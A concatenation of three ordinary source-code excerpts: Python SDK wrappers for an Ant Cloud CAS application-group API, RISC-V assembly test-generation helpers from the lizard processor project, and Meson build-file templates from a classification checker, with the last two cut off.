return await self.create_appgroup_ex_async(request, headers, runtime)
def create_appgroup_ex(
self,
request: cas_models.CreateAppgroupRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.CreateAppgroupResponse:
"""
Description: Create an application group
Summary: Create an application group
"""
UtilClient.validate_model(request)
return cas_models.CreateAppgroupResponse().from_map(
self.do_request('1.0', 'antcloud.cas.appgroup.create', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
async def create_appgroup_ex_async(
self,
request: cas_models.CreateAppgroupRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.CreateAppgroupResponse:
"""
Description: Create an application group
Summary: Create an application group
"""
UtilClient.validate_model(request)
return cas_models.CreateAppgroupResponse().from_map(
await self.do_request_async('1.0', 'antcloud.cas.appgroup.create', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
def list_appgroup_owner(
self,
request: cas_models.ListAppgroupOwnerRequest,
) -> cas_models.ListAppgroupOwnerResponse:
"""
Description: Get the list of application owners
Summary: Get the list of application owners
"""
runtime = util_models.RuntimeOptions()
headers = {}
return self.list_appgroup_owner_ex(request, headers, runtime)
async def list_appgroup_owner_async(
self,
request: cas_models.ListAppgroupOwnerRequest,
) -> cas_models.ListAppgroupOwnerResponse:
"""
Description: Get the list of application owners
Summary: Get the list of application owners
"""
runtime = util_models.RuntimeOptions()
headers = {}
return await self.list_appgroup_owner_ex_async(request, headers, runtime)
def list_appgroup_owner_ex(
self,
request: cas_models.ListAppgroupOwnerRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.ListAppgroupOwnerResponse:
"""
Description: Get the list of application owners
Summary: Get the list of application owners
"""
UtilClient.validate_model(request)
return cas_models.ListAppgroupOwnerResponse().from_map(
self.do_request('1.0', 'antcloud.cas.appgroup.owner.list', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
async def list_appgroup_owner_ex_async(
self,
request: cas_models.ListAppgroupOwnerRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.ListAppgroupOwnerResponse:
"""
Description: Get the list of application owners
Summary: Get the list of application owners
"""
UtilClient.validate_model(request)
return cas_models.ListAppgroupOwnerResponse().from_map(
await self.do_request_async('1.0', 'antcloud.cas.appgroup.owner.list', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
def get_appgroup_tree(
self,
request: cas_models.GetAppgroupTreeRequest,
) -> cas_models.GetAppgroupTreeResponse:
"""
Description: Query the application group tree structure
Summary: Query the application group tree structure
"""
runtime = util_models.RuntimeOptions()
headers = {}
return self.get_appgroup_tree_ex(request, headers, runtime)
async def get_appgroup_tree_async(
self,
request: cas_models.GetAppgroupTreeRequest,
) -> cas_models.GetAppgroupTreeResponse:
"""
Description: Query the application group tree structure
Summary: Query the application group tree structure
"""
runtime = util_models.RuntimeOptions()
headers = {}
return await self.get_appgroup_tree_ex_async(request, headers, runtime)
def get_appgroup_tree_ex(
self,
request: cas_models.GetAppgroupTreeRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.GetAppgroupTreeResponse:
"""
Description: Query the application group tree structure
Summary: Query the application group tree structure
"""
UtilClient.validate_model(request)
return cas_models.GetAppgroupTreeResponse().from_map(
self.do_request('1.0', 'antcloud.cas.appgroup.tree.get', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
async def get_appgroup_tree_ex_async(
self,
request: cas_models.GetAppgroupTreeRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.GetAppgroupTreeResponse:
"""
Description: Query the application group tree structure
Summary: Query the application group tree structure
"""
UtilClient.validate_model(request)
return cas_models.GetAppgroupTreeResponse().from_map(
await self.do_request_async('1.0', 'antcloud.cas.appgroup.tree.get', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
def get_appgroup_systemtree(
self,
request: cas_models.GetAppgroupSystemtreeRequest,
) -> cas_models.GetAppgroupSystemtreeResponse:
"""
Description: Query the application group tree structure
Summary: Query the application group tree structure
"""
runtime = util_models.RuntimeOptions()
headers = {}
return self.get_appgroup_systemtree_ex(request, headers, runtime)
async def get_appgroup_systemtree_async(
self,
request: cas_models.GetAppgroupSystemtreeRequest,
) -> cas_models.GetAppgroupSystemtreeResponse:
"""
Description: Query the application group tree structure
Summary: Query the application group tree structure
"""
runtime = util_models.RuntimeOptions()
headers = {}
return await self.get_appgroup_systemtree_ex_async(request, headers, runtime)
def get_appgroup_systemtree_ex(
self,
request: cas_models.GetAppgroupSystemtreeRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.GetAppgroupSystemtreeResponse:
"""
Description: Query the application group tree structure
Summary: Query the application group tree structure
"""
UtilClient.validate_model(request)
return cas_models.GetAppgroupSystemtreeResponse().from_map(
self.do_request('1.0', 'antcloud.cas.appgroup.systemtree.get', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
async def get_appgroup_systemtree_ex_async(
self,
request: cas_models.GetAppgroupSystemtreeRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.GetAppgroupSystemtreeResponse:
"""
Description: Query the application group tree structure
Summary: Query the application group tree structure
"""
UtilClient.validate_model(request)
return cas_models.GetAppgroupSystemtreeResponse().from_map(
await self.do_request_async('1.0', 'antcloud.cas.appgroup.systemtree.get', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
def delete_appgroup(
self,
request: cas_models.DeleteAppgroupRequest,
) -> cas_models.DeleteAppgroupResponse:
"""
Description: Delete a group
Summary: Delete a group
"""
runtime = util_models.RuntimeOptions()
headers = {}
return self.delete_appgroup_ex(request, headers, runtime)
async def delete_appgroup_async(
self,
request: cas_models.DeleteAppgroupRequest,
) -> cas_models.DeleteAppgroupResponse:
"""
Description: Delete a group
Summary: Delete a group
"""
runtime = util_models.RuntimeOptions()
headers = {}
return await self.delete_appgroup_ex_async(request, headers, runtime)
def delete_appgroup_ex(
self,
request: cas_models.DeleteAppgroupRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.DeleteAppgroupResponse:
"""
Description: Delete a group
Summary: Delete a group
"""
UtilClient.validate_model(request)
return cas_models.DeleteAppgroupResponse().from_map(
self.do_request('1.0', 'antcloud.cas.appgroup.delete', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
async def delete_appgroup_ex_async(
self,
request: cas_models.DeleteAppgroupRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.DeleteAppgroupResponse:
"""
Description: Delete a group
Summary: Delete a group
"""
UtilClient.validate_model(request)
return cas_models.DeleteAppgroupResponse().from_map(
await self.do_request_async('1.0', 'antcloud.cas.appgroup.delete', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
def update_appgroup(
self,
request: cas_models.UpdateAppgroupRequest,
) -> cas_models.UpdateAppgroupResponse:
"""
Description: Update a group
Summary: Update a group
"""
runtime = util_models.RuntimeOptions()
headers = {}
return self.update_appgroup_ex(request, headers, runtime)
async def update_appgroup_async(
self,
request: cas_models.UpdateAppgroupRequest,
) -> cas_models.UpdateAppgroupResponse:
"""
Description: Update a group
Summary: Update a group
"""
runtime = util_models.RuntimeOptions()
headers = {}
return await self.update_appgroup_ex_async(request, headers, runtime)
def update_appgroup_ex(
self,
request: cas_models.UpdateAppgroupRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.UpdateAppgroupResponse:
"""
Description: Update a group
Summary: Update a group
"""
UtilClient.validate_model(request)
return cas_models.UpdateAppgroupResponse().from_map(
self.do_request('1.0', 'antcloud.cas.appgroup.update', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
async def update_appgroup_ex_async(
self,
request: cas_models.UpdateAppgroupRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.UpdateAppgroupResponse:
"""
Description: Update a group
Summary: Update a group
"""
UtilClient.validate_model(request)
return cas_models.UpdateAppgroupResponse().from_map(
await self.do_request_async('1.0', 'antcloud.cas.appgroup.update', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
def list_applevel(
self,
request: cas_models.ListApplevelRequest,
) -> cas_models.ListApplevelResponse:
"""
Description: List all application levels
Summary: List all application levels
"""
runtime = util_models.RuntimeOptions()
headers = {}
return self.list_applevel_ex(request, headers, runtime)
async def list_applevel_async(
self,
request: cas_models.ListApplevelRequest,
) -> cas_models.ListApplevelResponse:
"""
Description: List all application levels
Summary: List all application levels
"""
runtime = util_models.RuntimeOptions()
headers = {}
return await self.list_applevel_ex_async(request, headers, runtime)
def list_applevel_ex(
self,
request: cas_models.ListApplevelRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.ListApplevelResponse:
"""
Description: List all application levels
Summary: List all application levels
"""
UtilClient.validate_model(request)
return cas_models.ListApplevelResponse().from_map(
self.do_request('1.0', 'antcloud.cas.applevel.list', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
async def list_applevel_ex_async(
self,
request: cas_models.ListApplevelRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.ListApplevelResponse:
"""
        Description: List all application levels
        Summary: List all application levels
"""
UtilClient.validate_model(request)
return cas_models.ListApplevelResponse().from_map(
await self.do_request_async('1.0', 'antcloud.cas.applevel.list', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
def exist_applevel(
self,
request: cas_models.ExistApplevelRequest,
) -> cas_models.ExistApplevelResponse:
"""
        Description: Check whether an application level exists
        Summary: Check whether an application level exists
"""
runtime = util_models.RuntimeOptions()
headers = {}
return self.exist_applevel_ex(request, headers, runtime)
async def exist_applevel_async(
self,
request: cas_models.ExistApplevelRequest,
) -> cas_models.ExistApplevelResponse:
"""
        Description: Check whether an application level exists
        Summary: Check whether an application level exists
"""
runtime = util_models.RuntimeOptions()
headers = {}
return await self.exist_applevel_ex_async(request, headers, runtime)
def exist_applevel_ex(
self,
request: cas_models.ExistApplevelRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.ExistApplevelResponse:
"""
        Description: Check whether an application level exists
        Summary: Check whether an application level exists
"""
UtilClient.validate_model(request)
return cas_models.ExistApplevelResponse().from_map(
self.do_request('1.0', 'antcloud.cas.applevel.exist', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
async def exist_applevel_ex_async(
self,
request: cas_models.ExistApplevelRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.ExistApplevelResponse:
"""
        Description: Check whether an application level exists
        Summary: Check whether an application level exists
"""
UtilClient.validate_model(request)
return cas_models.ExistApplevelResponse().from_map(
await self.do_request_async('1.0', 'antcloud.cas.applevel.exist', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
def create_applevel(
self,
request: cas_models.CreateApplevelRequest,
) -> cas_models.CreateApplevelResponse:
"""
        Description: Create an application level
        Summary: Create an application level
"""
runtime = util_models.RuntimeOptions()
headers = {}
return self.create_applevel_ex(request, headers, runtime)
async def create_applevel_async(
self,
request: cas_models.CreateApplevelRequest,
) -> cas_models.CreateApplevelResponse:
"""
        Description: Create an application level
        Summary: Create an application level
"""
runtime = util_models.RuntimeOptions()
headers = {}
return await self.create_applevel_ex_async(request, headers, runtime)
def create_applevel_ex(
self,
request: cas_models.CreateApplevelRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.CreateApplevelResponse:
"""
        Description: Create an application level
        Summary: Create an application level
"""
UtilClient.validate_model(request)
return cas_models.CreateApplevelResponse().from_map(
self.do_request('1.0', 'antcloud.cas.applevel.create', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
async def create_applevel_ex_async(
self,
request: cas_models.CreateApplevelRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.CreateApplevelResponse:
"""
        Description: Create an application level
        Summary: Create an application level
"""
UtilClient.validate_model(request)
return cas_models.CreateApplevelResponse().from_map(
await self.do_request_async('1.0', 'antcloud.cas.applevel.create', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
def delete_applevel(
self,
request: cas_models.DeleteApplevelRequest,
) -> cas_models.DeleteApplevelResponse:
"""
        Description: Delete application group
        Summary: Delete application group
"""
runtime = util_models.RuntimeOptions()
headers = {}
return self.delete_applevel_ex(request, headers, runtime)
async def delete_applevel_async(
self,
request: cas_models.DeleteApplevelRequest,
) -> cas_models.DeleteApplevelResponse:
"""
        Description: Delete application group
        Summary: Delete application group
"""
runtime = util_models.RuntimeOptions()
headers = {}
return await self.delete_applevel_ex_async(request, headers, runtime)
def delete_applevel_ex(
self,
request: cas_models.DeleteApplevelRequest,
headers: Dict[str, str],
runtime: util_models.RuntimeOptions,
) -> cas_models.DeleteApplevelResponse:
"""
        Description: Delete application group
        Summary: Delete application group
"""
UtilClient.validate_model(request)
return cas_models.DeleteApplevelResponse().from_map(
self.do_request('1.0', 'antcloud.cas.applevel.delete', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
)
async def delete_applevel_ex_async(
self,
request: cas_models.DeleteApplevelRequest,
        headers: Dict[str, str],
        runtime: util_models.RuntimeOptions,
    ) -> cas_models.DeleteApplevelResponse:
        """
        Description: Delete application group
        Summary: Delete application group
        """
        UtilClient.validate_model(request)
        return cas_models.DeleteApplevelResponse().from_map(
            await self.do_request_async('1.0', 'antcloud.cas.applevel.delete', 'HTTPS', 'POST', f'/gateway.do', TeaCore.to_map(request), headers, runtime)
        )
# Repository: cornell-brg/lizard
#=========================================================================
# inst_utils
#=========================================================================
# Includes helper functions to simplify creating assembly tests.
from pymtl import *
from tests.context import lizard
#-------------------------------------------------------------------------
# print_asm
#-------------------------------------------------------------------------
# Pretty print a generated assembly syntax
def print_asm(asm_code):
# If asm_code is a single string, then put it in a list to simplify the
# rest of the logic.
asm_code_list = asm_code
if isinstance(asm_code, str):
asm_code_list = [asm_code]
# Create a single list of lines
asm_list = []
for asm_seq in asm_code_list:
asm_list.extend(asm_seq.splitlines())
# Print the assembly. Remove duplicate blank lines.
prev_blank_line = False
for asm in asm_list:
if asm.strip() == "":
if not prev_blank_line:
print asm
prev_blank_line = True
else:
prev_blank_line = False
print asm
#-------------------------------------------------------------------------
# gen_nops
#-------------------------------------------------------------------------
def gen_nops(num_nops):
if num_nops > 0:
return "nop\n" + (" nop\n" * (num_nops - 1))
else:
return ""
#-------------------------------------------------------------------------
# gen_word_data
#-------------------------------------------------------------------------
def gen_word_data(data_list):
data_str = ".data\n"
for data in data_list:
data_str += ".word {}\n".format(data)
return data_str
#-------------------------------------------------------------------------
# gen_hword_data
#-------------------------------------------------------------------------
def gen_hword_data(data_list):
data_str = ".data\n"
for data in data_list:
data_str += ".hword {}\n".format(data)
return data_str
#-------------------------------------------------------------------------
# gen_byte_data
#-------------------------------------------------------------------------
def gen_byte_data(data_list):
data_str = ".data\n"
for data in data_list:
data_str += ".byte {}\n".format(data)
return data_str
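# Usage sketch (illustrative only): each gen_*_data helper emits a .data
# section with one directive per element, e.g.
#
#   gen_word_data([1, 2]) returns
#
#     .data
#     .word 1
#     .word 2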
#-------------------------------------------------------------------------
# gen_rr_src01_template
#-------------------------------------------------------------------------
# Template for register-register instructions. We first write src0
# register and then write the src1 register before executing the
# instruction under test. We parameterize the number of nops after
# writing both src registers and the instruction under test to enable
# using this template for testing various bypass paths. We also
# parameterize the register specifiers to enable using this template to
# test situations where the src registers are equal and/or equal the
# destination register.
def gen_rr_src01_template(num_nops_src0, num_nops_src1, num_nops_dest, reg_src0,
reg_src1, inst, src0, src1, result):
return """
# Move src0 value into register
csrr {reg_src0}, mngr2proc < {src0}
{nops_src0}
# Move src1 value into register
csrr {reg_src1}, mngr2proc < {src1}
{nops_src1}
# Instruction under test
{inst} x3, {reg_src0}, {reg_src1}
{nops_dest}
# Check the result
csrw proc2mngr, x3 > {result}
""".format(
nops_src0=gen_nops(num_nops_src0),
nops_src1=gen_nops(num_nops_src1),
nops_dest=gen_nops(num_nops_dest),
**locals())
#-------------------------------------------------------------------------
# gen_rr_src10_template
#-------------------------------------------------------------------------
# Similar to the above template, except that we reverse the order in
# which we write the two src registers.
def gen_rr_src10_template(num_nops_src0, num_nops_src1, num_nops_dest, reg_src0,
reg_src1, inst, src0, src1, result):
return """
# Move src1 value into register
csrr {reg_src1}, mngr2proc < {src1}
{nops_src1}
# Move src0 value into register
csrr {reg_src0}, mngr2proc < {src0}
{nops_src0}
# Instruction under test
{inst} x3, {reg_src0}, {reg_src1}
{nops_dest}
# Check the result
csrw proc2mngr, x3 > {result}
""".format(
nops_src0=gen_nops(num_nops_src0),
nops_src1=gen_nops(num_nops_src1),
nops_dest=gen_nops(num_nops_dest),
**locals())
#-------------------------------------------------------------------------
# gen_rr_dest_dep_test
#-------------------------------------------------------------------------
# Test the destination bypass path by varying how many nops are
# inserted between the instruction under test and reading the destination
# register with a csrr instruction.
def gen_rr_dest_dep_test(num_nops, inst, src0, src1, result):
return gen_rr_src01_template(0, 8, num_nops, "x1", "x2", inst, src0, src1,
result)
#-------------------------------------------------------------------------
# gen_rr_src1_dep_test
#-------------------------------------------------------------------------
# Test the source 1 bypass paths by varying how many nops are inserted
# between writing the src1 register and reading this register in the
# instruction under test.
def gen_rr_src1_dep_test(num_nops, inst, src0, src1, result):
return gen_rr_src01_template(8 - num_nops, num_nops, 0, "x1", "x2", inst,
src0, src1, result)
#-------------------------------------------------------------------------
# gen_rr_src0_dep_test
#-------------------------------------------------------------------------
# Test the source 0 bypass paths by varying how many nops are inserted
# between writing the src0 register and reading this register in the
# instruction under test.
def gen_rr_src0_dep_test(num_nops, inst, src0, src1, result):
return gen_rr_src10_template(num_nops, 8 - num_nops, 0, "x1", "x2", inst,
src0, src1, result)
#-------------------------------------------------------------------------
# gen_rr_srcs_dep_test
#-------------------------------------------------------------------------
# Test both source bypass paths at the same time by varying how many nops
# are inserted between writing both src registers and reading both
# registers in the instruction under test.
def gen_rr_srcs_dep_test(num_nops, inst, src0, src1, result):
return gen_rr_src01_template(0, num_nops, 0, "x1", "x2", inst, src0, src1,
result)
#-------------------------------------------------------------------------
# gen_rr_src0_eq_dest_test
#-------------------------------------------------------------------------
# Test situation where the src0 register specifier is the same as the
# destination register specifier.
def gen_rr_src0_eq_dest_test(inst, src0, src1, result):
return gen_rr_src01_template(0, 0, 0, "x3", "x2", inst, src0, src1, result)
#-------------------------------------------------------------------------
# gen_rr_src1_eq_dest_test
#-------------------------------------------------------------------------
# Test situation where the src1 register specifier is the same as the
# destination register specifier.
def gen_rr_src1_eq_dest_test(inst, src0, src1, result):
return gen_rr_src01_template(0, 0, 0, "x1", "x3", inst, src0, src1, result)
#-------------------------------------------------------------------------
# gen_rr_src0_eq_src1_test
#-------------------------------------------------------------------------
# Test situation where the src register specifiers are the same.
def gen_rr_src0_eq_src1_test(inst, src, result):
return gen_rr_src01_template(0, 0, 0, "x1", "x1", inst, src, src, result)
#-------------------------------------------------------------------------
# gen_rr_srcs_eq_dest_test
#-------------------------------------------------------------------------
# Test situation where all three register specifiers are the same.
def gen_rr_srcs_eq_dest_test(inst, src, result):
return gen_rr_src01_template(0, 0, 0, "x3", "x3", inst, src, src, result)
#-------------------------------------------------------------------------
# gen_rr_value_test
#-------------------------------------------------------------------------
# Test the actual operation of a register-register instruction under
# test. We assume that bypassing has already been tested.
def gen_rr_value_test(inst, src0, src1, result):
return gen_rr_src01_template(0, 0, 0, "x1", "x2", inst, src0, src1, result)
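# Example (illustrative only, assumes an RV32 "add" instruction): a value
# test such as
#
#   gen_rr_value_test("add", 4, 5, 9)
#
# loads 4 into x1 and 5 into x2 via csrr, executes "add x3, x1, x2", and
# checks that x3 holds 9 via csrw proc2mngr.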
#-------------------------------------------------------------------------
# gen_rimm_template
#-------------------------------------------------------------------------
# Template for register-immediate instructions. We first write the src
# register before executing the instruction under test. We parameterize
# the number of nops after writing the src register and the instruction
# under test to enable using this template for testing various bypass
# paths. We also parameterize the register specifiers to enable using
# this template to test situations where the src registers are equal
# and/or equal the destination register.
def gen_rimm_template(num_nops_src, num_nops_dest, reg_src, inst, src, imm,
result):
return """
# Move src value into register
csrr {reg_src}, mngr2proc < {src}
{nops_src}
# Instruction under test
{inst} x3, {reg_src}, {imm}
{nops_dest}
# Check the result
csrw proc2mngr, x3 > {result}
""".format(
nops_src=gen_nops(num_nops_src),
nops_dest=gen_nops(num_nops_dest),
**locals())
#-------------------------------------------------------------------------
# gen_rimm_dest_dep_test
#-------------------------------------------------------------------------
# Test the destination bypass path by varying how many nops are
# inserted between the instruction under test and reading the destination
# register with a csrr instruction.
def gen_rimm_dest_dep_test(num_nops, inst, src, imm, result):
return gen_rimm_template(8, num_nops, "x1", inst, src, imm, result)
#-------------------------------------------------------------------------
# gen_rimm_src_dep_test
#-------------------------------------------------------------------------
# Test the source bypass paths by varying how many nops are inserted
# between writing the src register and reading this register in the
# instruction under test.
def gen_rimm_src_dep_test(num_nops, inst, src, imm, result):
return gen_rimm_template(num_nops, 0, "x1", inst, src, imm, result)
#-------------------------------------------------------------------------
# gen_rimm_src_eq_dest_test
#-------------------------------------------------------------------------
# Test situation where the src register specifier is the same as the
# destination register specifier.
def gen_rimm_src_eq_dest_test(inst, src, imm, result):
return gen_rimm_template(0, 0, "x3", inst, src, imm, result)
#-------------------------------------------------------------------------
# gen_rimm_value_test
#-------------------------------------------------------------------------
# Test the actual operation of a register-immediate instruction under
# test. We assume that bypassing has already been tested.
def gen_rimm_value_test(inst, src, imm, result):
return gen_rimm_template(0, 0, "x1", inst, src, imm, result)
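# Example (illustrative only, assumes an RV32 "addi" instruction): a value
# test such as
#
#   gen_rimm_value_test("addi", 5, 3, 8)
#
# loads 5 into x1 via csrr, executes "addi x3, x1, 3", and checks that x3
# holds 8 via csrw proc2mngr.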
#-------------------------------------------------------------------------
# gen_imm_template
#-------------------------------------------------------------------------
# Template for immediate instructions. We parameterize the number of nops
# after the instruction under test to enable using this template for
# testing various bypass paths.
def gen_imm_template(num_nops_dest, inst, imm, result):
return """
# Instruction under test
{inst} x3, {imm}
{nops_dest}
# Check the result
csrw proc2mngr, x3 > {result}
""".format(
nops_dest=gen_nops(num_nops_dest), **locals())
#-------------------------------------------------------------------------
# gen_imm_dest_dep_test
#-------------------------------------------------------------------------
# Test the destination bypass path by varying how many nops are
# inserted between the instruction under test and reading the destination
# register with a csrr instruction.
def gen_imm_dest_dep_test(num_nops, inst, imm, result):
return gen_imm_template(num_nops, inst, imm, result)
#-------------------------------------------------------------------------
# gen_imm_value_test
#-------------------------------------------------------------------------
# Test the actual operation of an immediate instruction under test. We
# assume that bypassing has already been tested.
def gen_imm_value_test(inst, imm, result):
return gen_imm_template(0, inst, imm, result)
#-------------------------------------------------------------------------
# gen_br2_template
#-------------------------------------------------------------------------
# Template for branch instructions with two sources. We test two forward
# branches and one backwards branch. The way we actually do the test is
# we update a register to reflect the control flow; certain bits in this
# register are set at different points in the program. Then we can check
# the control flow bits at the end to see if only the bits we expect are
# set (i.e., the program only executed those points that we expect). Note
# that the test also makes sure that the instruction in the branch delay slot
# is _not_ executed.
# We currently need the id to create labels unique to this test. We might
# eventually allow local labels (e.g., 1f, 1b) as in gas.
gen_br2_template_id = 0
def gen_br2_template(num_nops_src0, num_nops_src1, reg_src0, reg_src1, inst,
src0, src1, taken):
# Determine the expected control flow pattern
if taken:
control_flow_pattern = 0b101010
else:
control_flow_pattern = 0b111111
# Create unique labels
global gen_br2_template_id
id_a = "label_{}".format(gen_br2_template_id + 1)
id_b = "label_{}".format(gen_br2_template_id + 2)
id_c = "label_{}".format(gen_br2_template_id + 3)
gen_br2_template_id += 3
return """
# x3 will track the control flow pattern
addi x3, x0, 0
# Move src0 value into register
csrr {reg_src0}, mngr2proc < {src0}
{nops_src0}
# Move src1 value into register
csrr {reg_src1}, mngr2proc < {src1}
{nops_src1}
{inst} {reg_src0}, {reg_src1}, {id_a} # br -.
addi x3, x3, 0b000001 # |
# |
{id_b}: | |
# Repository: nnamua/meson-classification-checker
# SPDX-FileCopyrightText: 2021 <NAME>
#
# SPDX-License-Identifier: Apache-2.0
from buildfile import IGNORE_STRING, BuildFile
from typing import Union
from util import varname
import objects, functions, os
"""
This file specifies templates for each type. The dictionary 'templates' contains
all regular templates, while the dictionary 'special' contains further template
dictionaries for functions and methods. In such a special template dictionary
the user can define templates for:
(1) the object of the method
(2) a certain parameter
(3) a certain parameter and a type, using key (param_name, T)
The variable 'OBJECT' can be used to reference, that a method requires a special
object to operate on.
The variables 'RANDOM_STRING' and 'BUILDFILE_DIR' are replaced by a respective string on usage.
'RANDOM_STRING' is required for target names, because multiple targets must not share
the same name.
"""
class TemplateNotFoundException(Exception):
pass
OBJECT = "_obj" # If a method requires a specific object, use this key in special templates
RANDOM_STRING = "$RANDOM_STRING$" # This substring will be replaced by a random string when fetching a template
BUILDFILE_DIR = "$BUILDFILE_DIR$" # This substring will be replaced by the working directory of the buildfile
def get_template(T, name=None, special_templates_key=None):
"""Returns the (special) template for a given type."""
# Without a special templates key (or a non-existing one), return regular template
if special_templates_key == None or special_templates_key not in special:
try:
tmpl = templates[T]
return tmpl.replace(RANDOM_STRING, f"'{varname()}'")
except KeyError:
raise TemplateNotFoundException(f"No template found for type {T}")
# Otherwise, return special template
special_templates = special[special_templates_key]
try:
if (name, T) in special_templates:
tmpl = special_templates[(name, T)]
elif name in special_templates:
tmpl = special_templates[name]
elif T in special_templates:
tmpl = special_templates[T]
else:
tmpl = templates[T]
except KeyError:
raise TemplateNotFoundException(f"No template found for type {T}")
return tmpl.replace(RANDOM_STRING, f"'{varname()}'")
def has_special_template(T, name, special_templates_key):
"""Returns whether a special template exists for the given combination."""
if special_templates_key not in special:
return False
special_templates = special[special_templates_key]
return (name, T) in special_templates or name in special_templates
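# Minimal usage sketch (illustrative only):
#
#   get_template(objects.Number)                                   # -> "42"
#   get_template(objects.String, name=OBJECT,
#                special_templates_key=objects.String.to_int)      # -> "'42'"
#
# The second call resolves through the 'special' dictionary defined below and
# falls back to the regular 'templates' entry when nothing special matches.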
templates = {
# Built-in objects
objects.Boolean : "true",
objects.Number : "42",
objects.String : "'String'",
objects.Dict : "{ 'foo' : 1, 'bar' : 2 }",
objects.Array : "[ 'str', 1, true ]",
objects.Meson : "meson",
objects.BuildMachine : "build_machine",
objects.HostMachine : "host_machine",
objects.TargetMachine: "target_machine",
# Returned objects
objects.File : "files('foo.c')[0]",
objects.ExternalFile : "files('foo.c')[0]",
objects.Compiler : "meson.get_compiler('c')",
objects.Dependency : "declare_dependency()",
objects.Environment : "environment()",
objects.ExternalProgram : "find_program('python3')",
objects.ConfiguredFile : "configure_file(input : 'config.h.in', output: 'config.h', configuration: configuration_data())",
objects.Executable : f"executable({RANDOM_STRING}, sources : ['foo.c'])",
objects.BuildTarget : f"build_target({RANDOM_STRING}, sources : ['foo.c'], target_type : 'executable')",
objects.Target : f"build_target({RANDOM_STRING}, sources : ['foo.c'], target_type : 'executable')",
objects.Jar : f"jar({RANDOM_STRING}, sources: 'foo.java')",
objects.ConfigurationData : "configuration_data({ 'foo' : 1, 'bar' : false })",
objects.CustomTarget : f"custom_target({RANDOM_STRING}, output : 'bar.c', input : 'bar.txt', command : [ find_program('script.py'), '@INPUT@', '@OUTPUT@'])",
objects.CustomTargetIndex : f"custom_target({RANDOM_STRING}, output : 'bar.c', input : 'bar.txt', command : [ find_program('script.py'), '@INPUT@', '@OUTPUT@'])[0]",
objects.Disabler : "disabler()",
objects.ExternalLibrary : "meson.get_compiler('c').find_library('m', required : false)",
objects.FeatureOption : "get_option('ft')",
objects.Generator : f"generator(executable({RANDOM_STRING}, sources: 'foo.c'), arguments : [ 'foo', '@EXTRA_ARGS@' ], output : '@BASENAME@')",
objects.Subproject : "subproject('foo_project')",
objects.RunResult : f"run_command(find_program('script.py'), [])",
objects.CompilationRunResult : f"meson.get_compiler('c').run('foo.c')",
objects.Module : "import('keyval')",
objects.IncludeDirectory : "include_directories('include')",
objects.BothLibraries : f"both_libraries({RANDOM_STRING}, sources : 'foo.c')",
objects.Library : f"library({RANDOM_STRING}, sources : 'foo.c')",
objects.SharedLibrary : f"shared_library({RANDOM_STRING}, sources : 'foo.c')",
objects.StaticLibrary : f"static_library({RANDOM_STRING}, sources : 'foo.c')",
objects.Range : "range(0,10,1)",
objects.SharedModule : f"shared_module({RANDOM_STRING}, sources : 'foo.c')",
objects.GeneratorTarget : "generator(find_program('script.py'), output : '@[email protected]', arguments : [ '@INPUT@' ]).process('foo.c')",
objects.RunTarget : f"run_target({RANDOM_STRING}, command : ['meson'])",
# Arrays with specified type
objects.Array[objects.Boolean] : "[ true, false ]",
objects.Array[objects.Number] : "[ 1, 2, 3 ]",
objects.Array[objects.String] : "[ 'foo', 'bar' ]",
objects.Array[objects.File] : "files('foo.c', 'bar.c')",
objects.Array[objects.ExternalFile] : "files('foo.c', 'bar.c')",
objects.Array[objects.Dependency] : "[ declare_dependency(), declare_dependency() ]",
objects.Array[objects.Target] : f"[ build_target({RANDOM_STRING}, sources : ['foo.c'], target_type : 'executable') ]",
objects.Array[objects.IncludeDirectory] : "include_directories('include')",
